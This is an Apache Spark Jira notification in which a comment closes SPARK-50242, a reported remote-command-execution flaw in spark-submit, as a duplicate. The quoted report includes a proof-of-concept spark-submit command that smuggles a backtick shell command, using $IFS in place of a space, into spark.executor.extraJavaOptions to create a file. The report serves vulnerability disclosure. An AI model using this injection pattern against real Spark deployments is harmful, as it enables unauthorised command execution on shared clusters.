[jira] [Commented] (SPARK-50242) (RCE) Command Execution Vulnerability in Spark

Soumasish Goswami (Jira) Mon, 25 Nov 2024 08:00:35 -0800


    [ 
https://issues.apache.org/jira/browse/SPARK-50242?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=17900947#comment-17900947
 ]


Soumasish Goswami commented on SPARK-50242:
-------------------------------------------

Duplicate of [SPARK-50240|https://issues.apache.org/jira/browse/SPARK-50240]

> (RCE) Command Execution Vulnerability in Spark
> ----------------------------------------------
>
>                 Key: SPARK-50242
>                 URL: https://issues.apache.org/jira/browse/SPARK-50242
>             Project: Spark
>          Issue Type: Bug
>          Components: Spark Submit
>    Affects Versions: 3.5.3
>            Reporter: Lu jiadong
>            Priority: Critical
>
> Spark allow user to deploy jar packet with`extraJavaOptions` ,
> but spark has incomplete check of it, leading to command execution.
>  
> using below command can see the /abc file was created: 
> spark-submit --class JavaWordCount --master yarn --deploy-mode client --conf 
> spark.executor.extraJavaOptions="\`touch\$IFS/abc\`" test.jar 
>  
>  
>  



--
This message was sent by Atlassian Jira
(v8.20.10#820010)

---------------------------------------------------------------------
To unsubscribe, e-mail: issues-unsubscr...@spark.apache.org
For additional commands, e-mail: issues-h...@spark.apache.org

[jira] [Commented] (SPARK-50242) (RCE) Command Execution Vulnerability in Spark

Reply via email to